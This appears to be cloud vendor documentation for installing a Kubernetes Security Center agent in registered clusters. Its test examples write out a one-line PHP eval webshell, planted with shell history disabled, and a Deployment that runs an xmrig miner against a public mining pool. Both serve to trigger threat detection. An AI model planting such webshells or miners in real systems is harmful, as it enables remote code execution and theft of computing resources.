Install and use Security Center in registered clusters - Container Service for Kubernetes

Security Center is a centralized security management system that dynamically identifies and analyzes security threats, and generates alerts when threats are detected. Security Center provides multiple features to ensure the security of cloud resources and servers in data centers. The features include anti-ransomware, antivirus, web tamper proofing, container image scan, and compliance check. This allows you to automate threat detection, alerting, and threat tracing, and meet regulatory compliance requirements. This topic describes how to install and use Security Center in registered clusters.

Prerequisites

A cluster registration proxy is created and an external Kubernetes cluster is connected to the cluster registration proxy. For more information, see Create a registered cluster.
Security Center is activated. For more information, see Purchase Security Center.
A kubectl client is connected to the cluster. For more information, see Obtain the kubeconfig file of a cluster and use kubectl to connect to the cluster.

Background information

Security Center generates alerts for detected threats in real time. Security Center allows you to identify vulnerabilities, perform baseline checks, and check configurations of your cloud services. This helps you reinforce system security and prevents attacks. Security Center can analyze the security situation of your assets and provides a graphical user interface that allows you to trace and analyze security events. This helps you build a high-performance security system for your assets. The assets include Elastic Compute Service (ECS) instances, servers that are deployed on hybrid clouds, containers, and cloud services.

Step 1: Install Security Center

Log on to the ACK console. In the left-side navigation pane, choose Marketplace > Marketplace.
On the Marketplace page, click the App Catalog tab. Find and click ack-aegis-installer.
On the ack-aegis-installer page, click Deploy.
On the Basic Information wizard page, select a cluster and a namespace, and then click Next.

Specify parameters related to the ack-aegis-installer component.

Log on to the Security Center console. In the left-side navigation pane, click System Configuration > Feature Settings.
On the Feature Settings page, click the Agent tab and then click the Client Installation Command tab to obtain the install_key.

On the Parameters wizard page, configure the parameters and click OK.

Important

If you do not specify the install_key parameter or the value of the parameter is invalid, the system fails to install Security Center.

Parameter	Description	Default
controller.cluster_id	The ID of the cluster.	The ID of the selected cluster, which is automatically specified.
controller.cluster_name	The name of the cluster.	The name of the selected cluster, which is automatically specified.
limit_cpu	The maximum CPU utilization.	`200m`
limit_memory	The maximum memory usage.	`128Mi`
imagePullPolicy	The policy used to pull images.	`Always`
install_key	The key that is required to install the Security Center component.	By default, this parameter is left empty. You must specify this parameter with the install_key that you previously obtained.

Step 2: Use Security Center

The following examples describe how to use Security Center in a registered cluster.

Example 1: Run suspicious commands in a pod

Create a file named ubuntu.yaml with the following content:

apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    command: ["/bin/sleep", "3650d"]
    imagePullPolicy: IfNotPresent
  restartPolicy: Always

Run the following command to deploy the pod named ubuntu:
```
kubectl apply -f ubuntu.yaml
```
Run the following command to anonymously inject a suspicious webshell file into the pod that is deployed:
```
bash -c "unset HISTFILE && echo '<?php @eval(\$_POST['x']); ?>' >shell.php"
```
Log on to the Security Center console and view the threat detection result.
For more information, see View and handle alerts.

Example 2: Deploy a mining container in a registered cluster

Note

The test image used in this example is built based on the xmrig image that is used for crypto mining. The image is used to simulate mining attacks.

Import the miner_image_xmrig.tar image to the test node.

Create a file named miner-test.yaml with the following content:

apiVersion: apps/v1 # for versions before 1.8.0 use apps/v1beta1
kind: Deployment
metadata:
  name: miner-test
  labels:
    app: miner-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: miner-test
  template:
    metadata:
      labels:
        app: miner-test
    spec:
      containers:
      - name: miner-test
        image: xxxxx        //  The image address. 
        args: ["-o xmr-eu2.nanopool.org:14444 -u AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -p worker -a rx/0"]

Run the following command to start the mining container:
```
kubectl apply -f miner-test.yaml
```
Log on to the Security Center console and view the threat detection result.
For more information, see View and handle alerts.
Run the following command to stop and delete the Deployment.
Important
You must delete the Deployment after the test is complete.
```
kubectl delete Deployment miner-test
```